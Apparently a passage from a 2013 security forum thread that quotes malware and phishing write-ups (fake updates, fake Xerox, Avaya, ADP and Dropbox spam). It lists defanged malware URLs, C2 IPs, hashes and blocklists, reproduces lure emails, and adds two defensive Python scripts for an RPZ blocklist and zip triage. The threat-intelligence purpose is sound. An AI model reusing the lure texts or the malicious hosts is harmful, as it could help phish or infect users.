Secondary iFrame: mxdistant .com – 213.239.231.141 ... Once executed, it phones back to anyplace-gateway .info – 76.72.165.63 – info@remote-control-pc .com... Moreover, updbrowser .com is also directly related to worldtraff .ru, as it used to push fake browser updates**, similar to the MD5s at bank7 .net and ztxserv .biz..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/c15139a1f4faef6bac513dc14875482b892cb27d1d202609fa3bf4a993c3cc75/analysis/

** http://stopmalvertising.com/malware-reports/does-your-browser-really-need-that-critical-update.html

- https://www.virustotal.com/en/ip-address/213.239.231.141/information/

- https://www.virustotal.com/en/ip-address/76.72.165.63/information/

- https://www.virustotal.com/en/ip-address/46.105.166.96/information/

- https://www.virustotal.com/en/ip-address/198.50.225.114/information/

- https://www.virustotal.com/en/ip-address/88.198.7.48/information/
___

Fake Flash update serves multitude of Firefox Extensions
- http://www.threattracksecurity.com/it-blog/fake-flash-update-serves-multitude-firefox-extensions/
Oct 17, 2013 - "“Update your Flash player”, they said:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/fakeflashfirefox1.png
Specifically, “Version 11.9.900.117” because “if you’re not using the latest version of Flash Player your version may contain vulnerabilities which can be used to attack your computer”. Above, we’re visiting updatedflashplayer(dot)com with Firefox. Running the file will offer up a wide selection of programs that don’t tend to come with what are supposed “security updates”:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/airinstall1.png
“After clicking next you will be presented with several great third party offers that can be skipped by pressing decline”
There’s no update to the latest version of Flash – merely something you can use to watch Flash videos with and a bunch of bundled programs. Here’s a few, starting with Fast Free Converter, an Adware plug-in:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/airinstall4.png
... Below you can see a typical install, with everything loaded up and ready to roll in your Firefox browser:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/installs.jpg
... As for the above “Flash Player update”, you can see some more information about it over on VirusTotal where it is currently pegged at 9/48*..."
* https://www.virustotal.com/en/file/04fbdf8f933ff6b8dd7e2d48df6fde372ce4cdd1b73bb9a44f1c9cd193b050c1/analysis/1381940695/
File name: setup.exe
Detection ratio: 9/48
___

Fake Xerox WorkCentre SPAM / A136_Incoming_Money_Transfer_Form.exe
- http://blog.dynamoo.com/2013/10/scan-from-xerox-workcentre-spam.html
17 Oct 2013 - "The malware spammers are suffering from a chronic lack of imagination with this familiar fake printer spam:
Date: Thu, 17 Oct 2013 13:01:52 -0600 [15:01:52 EDT]
From: Incoming Fax [Incoming.Fax3@ victimdomain .com]
Subject: Scan from a Xerox WorkCentre
Please download the document. It was scanned and sent to you using a Xerox multifunction device.
File Type: pdf
Download: Scanned from a Xerox multi~9.pdf
multifunction device Location: machine location not set
Device Name: Xerox1552
For more information on Xerox products and solutions, please visit http ://www .xerox .com

Attached is an executable file Scanned from a Xerox multi~6.zip which in turn contains a file A136_Incoming_Money_Transfer_Form.exe which has a VirusTotal detection rate of 6/48*. Automated analysis... shows a connection to cushinc .com on 209.236.71.58 (Westhost, US). This is the same server as seen yesterday**, so my best guess is that the server is compromised and potentially all the 600+ domains on it are too. Blocking that IP address may be prudent."
* https://www.virustotal.com/en/file/3555785d71083dd18eee762c1e2f768bfa7d4d91f6d0adbf747021a65da5a62e/analysis/1382037428/

** http://blog.dynamoo.com/2013/10/linkedin-spam-contractagreementwhatever.html

- https://www.virustotal.com/en/ip-address/209.236.71.58/information/

:mad: :fear:

AplusWebMaster
2013-10-18, 17:32
FYI...

Fake MS Update phish ...
- http://blog.dynamoo.com/2013/10/microsoft-windows-update-phish.html
18 Oct 2013 - "A random and untargeted attempt at phishing with a Windows Update twist.
From: Microsoft Office [accounts-updates@ microsoft .com]
Date: 17 October 2013 02:54
Subject: Microsoft Windows Update
Dear Customer,
Evaluation period has expired. For information on how to upgrade your windows software please Upgrade Here.
Thank you,
Copyright © 2013 Microsoft Inc. All rights reserved.

The email originates from 66.160.250.236 [mail.andrustrucking .com] which is a trucking company called Doug Andrus Distributing... perhaps they have had their email system compromised (maybe by someone using the same phishing technique)... the link in the email goes to a legitimate but -hacked- site and then lands on a phishing page hosted on [donotclick]www.cycook .com/zboard//microsoft-update/index.php.htm. Despite the email saying "Windows Update", the landing page has had Office branding crudely pasted into it.
Screenshot: https://lh3.ggpht.com/-iRzMFul5GSo/UmEvfhg7xYI/AAAAAAAACG8/Mz1-f0prhmE/s1600/msphish.png
Entering your credentials simply takes you to a genuine Microsoft page:
> https://lh3.ggpht.com/-1sopTIkGh-w/UmEwrqORkiI/AAAAAAAACHI/LDBANi89hG0/s1600/msphish2.png
Phishing isn't restricted to stuff like bank accounts, the spammers also like a fresh supply of email accounts to abuse, so as ever.. exercise caution."

Also see recent post: http://forums.spybot.info/showthread.php?66171-Fake-MS-updates&p=445961&viewfull=1#post445961

... and:
- https://isc.sans.edu/diary.html?storyid=16838
Last Updated: 2013-10-17 22:19:09 UTC
> https://isc.sans.edu/diaryimages/images/microsoft-phish.jpg
___

Rogue ads lead to toolbar PUA (Potentially Unwanted Application)
- http://www.webroot.com/blog/2013/10/18/rogue-ads-lead-mipony-download-accelerator-fun-moods-toolbar-pua-potentially-unwanted-application/
Oct 18, 2013 - "Potentially Unwanted Applications (PUAs) continue to visually social engineer users into installing virtually useless applications. They monetize each and every install by relying on ‘bundling’ which often comes in the form of a privacy-violating toolbar or third-party application. We recently intercepted a rogue ad that entices users into downloading the Mipony Download Accelerator that is bundled with the privacy-invading FunMoods toolbar PUA, an unnecessary bargain with the integrity and confidentiality of your PC.
Sample screenshot of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Download_Accelerator_Mipony_InstallCore_PUA_FunMoods_Toolbar_Potentially_Unwanted_Application.png
Detection rate for the PUA: MD5: 023e625cbb1b30565d46f7533ddc03db * ... W32/InstallCore.R4.gen!Eldorado; Install Core Click run software.
Domain name reconnaissance: ultimatedownloadaccelerator .com – 50.19.220.248; 174.129.22.118; 23.21.144.61; 23.23.144.245
Upon execution, it phones back to:
cdneu.ultimatedownloadaccelerator .com – 65.254.40.36
os-test.ultimatedownloadaccelerator .com – 54.244.230.64
cdnus.ultimatedownloadaccelerator .com – 199.58.87.155
img.ultimatedownloadaccelerator .com – 199.58.87.155...
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Download_Accelerator_Mipony_InstallCore_PUA_FunMoods_Toolbar_Potentially_Unwanted_Application_01.png
Detection rate for the FunMoods Toolbar: MD5: 592f35f9954a7ec4c0b4985857f81ad8 ** Win32/InstallCore; PUP.Optional.Funmoods
Once executed, it phones back to:
os.funmoodscdn .com 54.245.235.34
cdneu.funmoodscdn .com 146.185.27.53
cdnus.funmoodscdn .com 199.58.87.155 ...
Despite the fact that most modern day PUAs include uninstall instructions, our advice is to -not- install them in the first place, instead, seek a legitimate — often free but this time fully featured and working — alternative to their pseudo-unique value propositions..."
* https://www.virustotal.com/en/file/3096843008cc4c9363b1e96ccc4618bfc190455fc9266e1740ee1bad528ec71a/analysis/1381837813/

** https://www.virustotal.com/en/file/be4283edf1d9be7d7ab4e6e57e7c7e8737585be85a62d427f4965e417af3dd14/analysis/1381929038/

- https://www.virustotal.com/en/ip-address/199.58.87.155/information/

- https://www.virustotal.com/en/ip-address/146.185.27.53/information/

- https://www.virustotal.com/en/ip-address/54.245.235.34/information/

- https://www.virustotal.com/en/ip-address/54.244.230.64/information/

- https://www.virustotal.com/en/ip-address/65.254.40.36/information/

- https://www.virustotal.com/en/ip-address/50.19.220.248/information/

- https://www.virustotal.com/en/ip-address/174.129.22.118/information/

- https://www.virustotal.com/en/ip-address/23.21.144.61/information/

- https://www.virustotal.com/en/ip-address/23.23.144.245/information/
___

Fake Avaya "Voice Mail Message" SPAM - malicious payload
- http://blog.dynamoo.com/2013/10/avaya-voice-mail-message-spam-with.html
18 Oct 2013 - "This fake voice mail message appears to originate from within the victim's own domain (although that is just a forgery):
Date: Fri, 18 Oct 2013 09:19:42 -0600 [11:19:42 EDT]
From: Voice Mail Message [1c095eb9-fa18-74e5-b@victimdomain.com]
Subject: Voice Mail Message ( 45 seconds )
This voice message was created by Avaya Modular Messaging. To listen to this voice
message,just open it.

Attached is a file VoiceATT0685424.zip which in turn contains a malicious executable VoiceMessageTT.exe with an icon to make it look like an audio file. This trick can work if users have decided to hide the extensions of files in Windows, a stupid default setting that has no doubt infected millions of Windows users over the years.
Screenshot: https://lh3.ggpht.com/-S_u-eR8Vy9I/UmFlmRsohDI/AAAAAAAACHY/9ymnNl5QrZg/s1600/voicemessage.png
Of course, the .exe file is malware with a pretty low detection rate of just 3/48* at VirusTotal. Automated analysis... shows a connection to a domain called adamdevarney .com on 209.236.71.58 (Westhost, US) which has been seen twice before**. This means that there are potentially hundreds of compromised domains on the same server, blocking traffic to the IP address will be the most effective way of giving yourself some protection."
* https://www.virustotal.com/en/file/8a9656fec2d39d44e8656b961d568350df042fdded242d31c2af08b673301abb/analysis/1382114301/
File name: VoiceMessageTT.exe
Detection ratio: 3/48

** http://blog.dynamoo.com/2013/10/scan-from-xerox-workcentre-spam.html

** http://blog.dynamoo.com/2013/10/linkedin-spam-contractagreementwhatever.html

- https://www.virustotal.com/en/ip-address/209.236.71.58/information/
___

Fake Dropbox SPAM - dynamooblog .ru
- http://blog.dynamoo.com/2013/10/dropbox-spam-leads-to-malware-on-errr.html
18 Oct 2013 - "Two days ago I wrote about the apparent return of the RU:8080.. it appears that in order to celebrate their return, they've acknowledged my acknowledgement in the form of a malware landing page of dynamooblog .ru... this is the latest spam email purportedly from Dropbox, and using the same template as used in this ThreeScripts spam run*.
Screenshot: https://lh3.ggpht.com/-E-4Jwel4IN8/UmGl0a0kqII/AAAAAAAACHs/hgBHVc4h6yg/s1600/dropbox2.png
The attack and payload is exactly the same as this one**, and the executable is unchanged but now has a better VirusTotal detection rate of 29/48***. The domain dynamooblog .ru was registered yesterday to the infamous Russian "Private Person" and is hosted on a lot of IPs that have been serving up Zbot for some time... this is my recommended blocklist:
dynamooblog .ru, 12.46.52.147, 41.203.18.120, 62.76.42.58, 69.46.253.241, 70.159.17.146, 91.205.17.80, 94.102.14.239, 111.68.229.205, 114.32.54.164, 118.163.216.107, 140.174.98.150, 163.18.62.51, 182.237.17.180, 202.6.120.103, 203.80.16.81, 203.114.112.156, 210.56.23.100, 210.166.209.15, 212.154.192.122, 213.5.182.144, 213.143.121.133, 213.214.74.5 "
* http://blog.dynamoo.com/2013/10/fake-dropbox-spam-leads-to-malware-on.html

** http://blog.dynamoo.com/2013/10/your-facebook-friend-andrew-hernandez.html

*** https://www.virustotal.com/en/file/807f43d9649976a3ac7bc4b2506947ccedea2235eb80ac69a8246fb2b8c1a1b4/analysis/1382130555/
File name: ieupdate.exe
Detection ratio: 29/48

:mad: :fear:
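
The dynamoo write-ups quoted in this post and the ones before it keep turning up the same infrastructure: 209.236.71.58 (Westhost) sits behind the LinkedIn, Xerox WorkCentre and Avaya runs, and 69.46.253.241 appears in both the Pinterest and the Dropbox "RU:8080" blocklists. The following is an added example for this thread, not code from dynamoo or from the forum. It takes the defanged indicator text used in those posts ("alenikaofsa .ru", "[donotclick]...", "hxxp"), refangs it, builds one index of which indicator was seen in which post, reports the ones that recur, and emits BIND response-policy-zone records for a resolver blocklist. The post snippets it is fed are copied from this page; the IGNORE set of analyst-reference domains is an assumption of the example:

```python
"""Consolidate defanged indicator lists into one index and an RPZ blocklist (added example)."""
import ipaddress
import re
from collections import defaultdict

# Refang rules: "[donotclick]x .ru", "hxxp://", "x[.]ru", "x(dot)ru" -> plain forms.
DEFANG = [
    (re.compile(r"\[(?:donotclick|phish)\]", re.I), ""),
    (re.compile(r"hxxp", re.I), "http"),
    (re.compile(r"\s*\[\.\]\s*|\s*\(dot\)\s*|\s+\.\s*(?=[a-z0-9])", re.I), "."),
]
# A domain must not be preceded by "/" so path components such as /ieupdate.exe are skipped.
DOMAIN_RE = re.compile(r"(?<![\w./-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.I)
IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# Reference sites quoted in write-ups that are not indicators (assumption of the example).
IGNORE = {"dynamoo.com", "virustotal.com", "urlquery.net", "malwr.com"}


def refang(text):
    for pattern, repl in DEFANG:
        text = pattern.sub(repl, text)
    return text


def extract(text):
    """Return (domains, ips) found in one refanged write-up."""
    text = refang(text)
    domains = set()
    for d in DOMAIN_RE.findall(text):
        d = d.lower()
        if not any(d == i or d.endswith("." + i) for i in IGNORE):
            domains.add(d)
    ips = set()
    for s in IP_RE.findall(text):
        try:
            ip = ipaddress.ip_address(s)
        except ValueError:        # e.g. 300.1.2.3 matched the regex but is not an address
            continue
        if ip.is_global:          # drop RFC 1918, loopback, link-local and similar
            ips.add(str(ip))
    return domains, ips


def consolidate(posts):
    """Map each indicator to the set of post labels it was seen in."""
    index = defaultdict(set)
    for label, text in posts.items():
        domains, ips = extract(text)
        for ind in domains | ips:
            index[ind].add(label)
    return dict(index)


def shared(index, min_posts=2):
    """Indicators that recur across posts: the reused servers worth blocking by IP."""
    return {ind: labels for ind, labels in index.items() if len(labels) >= min_posts}


def to_rpz(index):
    """BIND RPZ records: QNAME triggers for domains, rpz-ip triggers for single hosts."""
    lines = []
    for ind in sorted(index):
        if IP_RE.fullmatch(ind):
            rev = ".".join(reversed(ind.split(".")))
            lines.append(f"32.{rev}.rpz-ip CNAME .")   # /32 host trigger, NXDOMAIN action
        else:
            lines.append(f"{ind} CNAME .")
            lines.append(f"*.{ind} CNAME .")
    return lines


# Snippets copied from the dynamoo posts quoted in this thread (October 2013).
POSTS = {
    "pinterest-16oct": (
        "attempts to download [donotclick]alenikaofsa .ru:8080/ieupdate.exe ... "
        "hosted on 62.75.246.191 (Intergenia AG, Germany) and 69.46.253.241 "
        "(RapidDSL & Wireless, US). The domain alionadorip .ru is also hosted on these IPs."
    ),
    "linkedin-16oct": "an attempted connection to miamelectric .com on 209.236.71.58 (Westhost, US).",
    "xerox-17oct": "shows a connection to cushinc .com on 209.236.71.58 (Westhost, US).",
    "avaya-18oct": "a connection to a domain called adamdevarney .com on 209.236.71.58 (Westhost, US).",
    "dropbox-18oct": (
        "recommended blocklist: dynamooblog .ru, 12.46.52.147, 41.203.18.120, 62.76.42.58, "
        "69.46.253.241, 70.159.17.146"
    ),
}

if __name__ == "__main__":
    index = consolidate(POSTS)
    for ind, labels in sorted(shared(index).items()):
        print(f"reused across {len(labels)} posts: {ind}  {sorted(labels)}")
    print("\n".join(to_rpz(index)))
```

The recurrence report is the practical point of the dynamoo advice to block 209.236.71.58 rather than the individual compromised domains on it: one Westhost address covers three campaigns, while each domain name covers one.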

AplusWebMaster
2013-10-21, 19:16
FYI...

Fake billing SPAM - Remit_10212013.exe
- http://blog.dynamoo.com/2013/10/last-month-remit-spam-remit10212013.html
21 Oct 2013 - "This -bogus- remittance spam comes with a malicious attachment:
Date: Mon, 21 Oct 2013 15:08:15 +0100 [10:08:15 EDT]
From: Administrator [docs9@ victimdomain]
Subject: FW: Last Month Remit
File Validity: 21/10/2013
Company : http ://[victimdomain
File Format: Office - Excel
Internal Name: Remit File
Legal Copyright: Microsoft Corporation. All rights reserved.
Original Filename: Last month remit file.xls ...

Screenshot: https://lh3.ggpht.com/-9V_pNykJ8sY/UmU-MFH_t5I/AAAAAAAACIA/tsWBG4K21o4/s1600/remit.png

The email appears to originate from the victim's own domain, and mentions that domain in the body of the text. The attachment also contains the victim's domain in the format Remit_domain.tld.zip which in turn contains a malicious executable with an icon designed to look like a Microsoft Excel file, in this case it is called Remit_10212013.exe but note that the date is encoded into the filename. The malicious payload has a very low detection rate at VirusTotal of just 2/47*. Automated analysis tools... show an attempted connection to p3-sports .com on 192.232.198.101 (Websitewelcome, US). There may be other infected domains on the same IP if previous patterns are repeated. Also, the malware appears to try to connect to the following IPs** demonstrating a peer-to-peer capability."
* https://www.virustotal.com/en-gb/file/ba281955fe4332c18f4a5981160cca4973edbfde28c14a7b54e7b2d8dbbcb5fc/analysis/1382365823/

** https://malwr.com/analysis/YzVmYzljOTQwYTdjNDI0OWI3OWYxNGVhNzQzMzBiYzQ/

:fear: :mad:
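
Several of the dynamoo write-ups in this thread (USPS, Intuit, LinkedIn, Xerox WorkCentre, Avaya, and this remittance run) describe the same delivery: a zip holding an .exe whose filename carries the campaign date and whose icon or name imitates a document, relying on Windows hiding known file extensions so the victim sees "payroll_report_10112013" or "VoiceMessageTT". The following is an added example for this thread, not code from dynamoo or from the forum, that triages such an attachment offline: it lists the zip members, hashes them for a VirusTotal lookup, decodes the _MMDDYYYY / _MMDDYY stamp and compares it with the receipt date, shows how each name renders with extensions hidden, and flags executables and double extensions. The zip and the "MZ" stub inside it are constructed for the example, and the second member name (a .pdf.exe) is a constructed variation, not a file named in any of the posts:

```python
"""Offline triage of a zip-wrapped malware attachment (added example)."""
import hashlib
import io
import re
import zipfile
from datetime import date, datetime

EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs", ".jar"}
DOC_EXT = {".pdf", ".xls", ".xlsx", ".doc", ".docx", ".txt", ".wav", ".mp3"}
# _MMDDYY or _MMDDYYYY followed by ".", "_" or end of name, as in payroll_report_10112013.exe
DATE_RE = re.compile(r"_(\d{2})(\d{2})(\d{2}|\d{4})(?=[._]|$)")


def split_ext(name):
    """('payroll_report_10112013', '.exe'); names without an extension get ''."""
    base, dot, ext = name.rpartition(".")
    return (base, "." + ext.lower()) if dot and base else (name, "")


def explorer_display_name(name):
    """What Explorer shows with 'Hide extensions for known file types' switched on."""
    return split_ext(name)[0]


def date_in_name(name):
    """First parseable date stamp in the name, else None."""
    for m in DATE_RE.finditer(name):
        mm, dd, yy = m.groups()
        fmt = "%m%d%y" if len(yy) == 2 else "%m%d%Y"
        try:
            return datetime.strptime(mm + dd + yy, fmt).date()
        except ValueError:          # e.g. _147310431_ in the Intuit zip name is not a date
            continue
    return None


def build_zip(members):
    """Build an in-memory zip from {name: bytes}; used here only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def triage_zip(zip_bytes, received, window_days=7):
    """Inspect every member without executing anything; return members and findings."""
    if isinstance(received, str):
        received = date.fromisoformat(received)
    members, findings = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            base, ext = split_ext(info.filename)
            is_pe = data[:2] == b"MZ"            # DOS/PE header, whatever the extension says
            stamp = date_in_name(info.filename)
            member = {
                "name": info.filename,
                "display_name": explorer_display_name(info.filename),
                "size": len(data),
                "is_pe": is_pe,
                "date": stamp.isoformat() if stamp else None,
                "md5": hashlib.md5(data).hexdigest(),        # for VirusTotal lookups
                "sha256": hashlib.sha256(data).hexdigest(),
            }
            members.append(member)
            if ext in EXEC_EXT:
                findings.append(f"{info.filename}: executable ({ext}) delivered inside a zip")
            if is_pe and ext not in EXEC_EXT:
                findings.append(f"{info.filename}: PE header under a non-executable extension")
            if split_ext(base)[1] in DOC_EXT:
                findings.append(f"{info.filename}: double extension, shown as "
                                f"'{member['display_name']}' when extensions are hidden")
            if stamp and abs((received - stamp).days) <= window_days:
                findings.append(f"{info.filename}: date stamp {stamp} within {window_days} "
                                f"days of receipt, per-run build")
    return {"members": members, "findings": findings}


# Constructed sample: a two-byte MZ header plus filler, not a real executable.
FAKE_PE = b"MZ" + b"\x00" * 30 + b"constructed stub for the example, not a real PE"
SAMPLE_ZIP = build_zip({
    "payroll_report_10112013.exe": FAKE_PE,            # name from the Intuit run
    "Scanned from a Xerox multi~9.pdf.exe": FAKE_PE,   # constructed double-extension variant
})

if __name__ == "__main__":
    result = triage_zip(SAMPLE_ZIP, "2013-10-15")
    for m in result["members"]:
        print(f"{m['name']!r} shows as {m['display_name']!r}; sha256={m['sha256']}")
    for f in result["findings"]:
        print("FLAG:", f)
```

The date check is the useful part for a gateway rule: a stamp inside the window is a build compiled for this run, which is exactly the situation where the 2/47 to 9/48 VirusTotal scores quoted above are expected, so the filename pattern is a better trigger than the signature count.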

AplusWebMaster
2013-10-22, 13:51
FYI...

Rogue ads lead to the ‘EzDownloaderpro’ PUA (Potentially Unwanted Application)
- http://www.webroot.com/blog/2013/10/22/rogue-ads-lead-ezdownloaderpro-pua-potentially-unwanted-application/
Oct 22, 2013 - "We’ve just intercepted yet another rogue ad campaign, attempting to trick users into installing the EzDownloaderpro PUA (Potentially Unwanted Application). Primarily relying on catchy “Play Now, Download Now” banners, the visual social engineering tactic of this campaign is similar to other PUA related campaigns we’ve previously profiled...
Sample screenshot of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/EzDownloadpro_PUA_Potentially_Unwanted_Application_Rogue_Ad_Privacy-1024x490.png
Landing URL: lp.ezdownloadpro .info/sspcQA/ssa/ – 46.165.228.246
Domain name reconnaissance of the redirectors:
superfilesdocumentsy .asia/v944/?a=1 – 141.101.117.252; 141.101.116.252
applicationscenterforally .asia/v944/?INm – 108.162.197.34; 108.162.196.34
op.applicationscenterforally .asia/sspcQA/ssa/ ...
The following MD5 is also known to have been downloaded from the same IP (108.162.197.34):
MD5: bc44e23e46fa4c3e73413c130d4f2018 *
Detection rate for the sample ‘pushed’ by the rogue Download page: MD5: e8c9c2db3514f375f74b60cb9dfcd4ef ** PUP.Optional.InstalleRex; Installerex/WebPick (fs)
Once executed, the sample phones back to:
r1.stylezip .info – 198.7.61.118
c1.stylezip .info – 198.7.61.118
i1.stylezip .info – 198.7.61.118
... Detection rate for the original EzDownloadpro executable: MD5: 292b53b745e3fc4af79924a3c11fcff0 *** Win32:InstalleRex-U [PUP]; MalSign.Skodna.Pick; PUP.Optional.EZDownloader.A
Sample screenshot of EzDownloadpro’s official Web site:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/EzDownloadpro_PUA_Potentially_Unwanted_Application_Rogue_Ad_Privacy_01.png
Unique PUA MD5s served based on multiple requests to the same URL (applicationscenterforally .asia/v944/?INm)..."
(More detail at the webroot URL.)

* https://www.virustotal.com/en/file/9b5d1ddabc8d19246443e5afd73e95a9c34d3ffadb1f55d624488ba5bcb18cdc/analysis/

** https://www.virustotal.com/en/file/66f660ef7c260b1a9da9be0466882043efc01b86de44a6baf849e49c66893237/analysis/1381845366/

*** https://www.virustotal.com/en/file/be42dcbc7c8bad64854a93ba9b853c6492a6405ab0324fd42429908d09fc9589/analysis/

- https://www.virustotal.com/en/ip-address/46.165.228.246/information/

- https://www.virustotal.com/en/ip-address/141.101.116.252/information/

- https://www.virustotal.com/en/ip-address/141.101.117.252/information/

- https://www.virustotal.com/en/ip-address/108.162.196.34/information/

- https://www.virustotal.com/en/ip-address/108.162.197.34/information/

- https://www.virustotal.com/en/ip-address/198.7.61.118/information/
___

Fake ADP SPAM / abrakandabr .ru
- http://blog.dynamoo.com/2013/10/adp-spam-abrakandabrru.html
22 Oct 2013 - "This fake ADP spam leads to malware on abrakandabr .ru:
From: ClientService@ adp .com [ClientService@ adp .com]
Date: 22 October 2013 18:04
Subject: ADP RUN: Account Charge Alert
ADP Urgent Communication
Note ID: 33400
October, 22 2013
Valued ADP Partner
Account operator with ID 58941 Refused Yesterday Payroll Operation from your ADP account recently. Report(s) have been uploaded to the website:
Sign In here
Please see the following notes:
• Please note that your bank account will be debited within 1 banking day for the total shown on the Summary(s)...

Screenshot: https://lh3.ggpht.com/-kuQevnVKmHA/Uma1nwWs78I/AAAAAAAACIU/rRK4oYQnzDU/s1600/adp-spam3.png

The link goes through a legitimate hacked site and then onto a malware landing page at [donotclick]abrakandabr .ru:8080/adp.report.php (if running Windows, else they get sent to adp .com). This is hosted on quite a lot of IP addresses:
69.46.253.241 (RapidDSL & Wireless, US)
91.205.17.80 (TOV Adamant-Bild, Ukraine)
111.68.229.205 (NTT Communications, Japan)
114.32.54.164 (Chunghwa Telecom, Taiwan)
118.163.216.107 (Chunghwa Telecom, Taiwan)
163.18.62.51 (TANET, Taiwan)
202.6.120.103 (TSKL, Kiribati)
203.80.16.81 (MYREN, Malaysia)
203.114.112.156 (PhetchaboonHospital, Thailand)
210.56.23.100 (Commission For Science And Technology, Pakistan)
210.166.209.15 (Prox Communicator, Japan)
212.154.192.122 (Hoster.KZ, Kazakhstan)
213.214.74.5 (BBC Cable, Bulgaria)
As mentioned before, this is either the return of the infamous RU:8080 gang, or it is somebody -pretending- to be the gang. But one rather peculiar factor is that in this case the bad guys only seem to have a small pool of servers that have been compromised for some time, and don't seem to have added any new ones.
Recommended blocklist:
(Full list at the dynamoo URL above.)"

- http://threattrack.tumblr.com/post/64787914171/adp-invoice-spam
Oct 22, 2013 - "Subjects Seen:
Payroll Invoice
Typical e-mail details:
A copy of your ADP TotalSource Payroll Invoice for the following payroll is is attached in PDF file and available for viewing.
Year: 13
Week No: 08
Payroll No: 1

Malicious File Name and MD5:
invoice.zip (5B9EABC34B1A326F6491613E9FD6AAFD)
invoice_<random>.pdf.exe
(12C700409E6DB4A6E043BD3BBD3A1A21)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c50b35a4e0ca49843f16c4932723d3d0/tumblr_inline_mv30siC2sP1r6pupn.png
___

Fake Xerox WorkCentre emails lead to malware
- http://www.webroot.com/blog/2013/10/22/fake-scanned-image-xerox-workcentre-themed-emails-lead-malware/
Oct 22, 2013 - "We’ve intercepted a currently circulating malicious spam campaign, tricking users into thinking that they’ve received a scanned document sent from a Xerox WorkCentre Pro device. In reality, once users execute the malicious attachment, the cybercriminal(s) behind the campaign gain complete control over the now infected host.
Sample screenshots of the spamvertised malicious email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Email_Spam_Malicious_Fake_Social_Engineering_Malware_Malicious_Software_Xerox_WorkCentre_Pro.png
Detection rate for the malicious attachment: MD5: 1a339ecfac8d2446e2f9c7e7ff639c56 * ... TROJ_UPATRE.AX; Heuristic.LooksLike.Win32.SuspiciousPE.J!89... phones back to:
smclan .com – 209.236.71.58 ... malicious domains are also currently responding to the same IP ..."
* https://www.virustotal.com/en/file/b1769b5b65c3c93c1fd6f17380dc23678af1033ed2b51a6d876bdc9867d279f0/analysis/

- https://www.virustotal.com/en/ip-address/209.236.71.58/information/

:mad: :mad:

AplusWebMaster
2013-10-23, 17:58
FYI...

Fake Voice msg. SPAM / VoiceMessage .exe
- http://blog.dynamoo.com/2013/10/voice-message-from-unknown-spam.html
23 Oct 2013 - "These bogus voice message spams have a malicious attachment:
Date: Wed, 23 Oct 2013 19:17:42 +0530 [09:47:42 EDT]
From: Administrator [voice8@ victimdomain]
Subject: Voice Message from Unknown (553-843-8846)
- - -Original Message- - -
From: 553-843-8846
Sent: Wed, 23 Oct 2013 19:17:42 +0530
To: [recipient list at victimdomain]
Subject: Important: to all Employee
- -
Date: Wed, 23 Oct 2013 08:36:24 -0500 [09:36:24 EDT]
From: Administrator [voice3@ victimdomain]
Subject: Voice Message from Unknown (586-898-9333)
- - -Original Message- - -
From: 586-898-9333
Sent: Wed, 23 Oct 2013 08:36:24 -0500
To: [recipient list at victimdomain]
Subject: Employees Only ...

In each case there is an attachment VoiceMessage.zip which in turn contains an executable VoiceMessage.exe with an icon to make it look like an audio file.
> https://lh3.ggpht.com/-xjhFKIS98do/UmfX0oudikI/AAAAAAAACIk/HP043i6x5_Q/s1600/voicemessage.png
Obviously this is malicious, and the detection rate at VirusTotal is a pretty poor 5/46*. Automated analysis... shows an attempted connection to glyphs-design .com on 212.199.115.173 (012 Smile Communications Ltd, Israel). Blocking that domain is probably prudent, however there are several hundred legitimate domains on the same server, so bear that in mind if you choose to block it."
* https://www.virustotal.com/en-gb/file/4d1f10d965fb352617ed1e33491f74d2519304bbc97916e18a014d4481c29f65/analysis/1382536265/
File name: VoiceMessage.exe
Detection ratio: 5/47

- https://www.virustotal.com/en-gb/ip-address/212.199.115.173/information/

- http://threattrack.tumblr.com/post/64865370226/voice-message-spam
Oct 23, 2013 - "Subjects Seen:
Voice Message from Unknown (389-353-7349)
Typical e-mail details:
- - -Original Message- - -
From: 389-353-7349
Sent: Wed, 23 Oct 2013 08:52:48 -0500
To: <e-mail addresses>
Subject: Important: to all Employees

Malicious File Name and MD5:
VoiceMessage.zip (D33AF1A7B51CFA41EAAB6292E0F6EBBE)
VoiceMessage.exe
(535109E4902D32BB6F11F7235FCEC6C4)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c93f93751266d3c4f4d55cdb835be450/tumblr_inline_mv4kshNZfU1r6pupn.png

:fear: :sad: :mad:

AplusWebMaster
2013-10-24, 18:50
FYI...

Fake resume SPAM / Resume_LinkedIn.exe
- http://blog.dynamoo.com/2013/10/my-resume-spam-resumelinkedinexe.html
24 Oct 2013 - "This rather terse spam email message has a malicious attachment:
Date: Thu, 24 Oct 2013 15:45:37 +0200 [09:45:37 EDT]
From: Elijah Parr [Elijah.Parr@ linkedin .com]
Subject: My resume
Attached is my resume, let me know if its ok.
Thanks,
Elijah Parr
------------------------
Date: Thu, 24 Oct 2013 19:14:37 +0530 [09:44:37 EDT]
From: Greg Barnes [Greg.Barnes@ linkedin .com]
Subject: My resume
Attached is my resume, let me know if its ok.
Thanks,
Greg Barnes

The attachment is Resume_LinkedIn.zip which in turn contains a malicious executable Resume_LinkedIn.exe with an icon to make it look like a Word Document rather than an executable. VirusTotal is timing out at the moment, but earlier only one AV engine detected it (Norman). Automated analysis tools... show an attempted connection to homevisitor .co .uk on 64.50.166.122 (Lunarpages, US). This server was distributing malware last month too, so we must assume that it is compromised. Blocking that IP address would probably be a good idea as there are several other compromised domains on that same server [1]* [2]**."
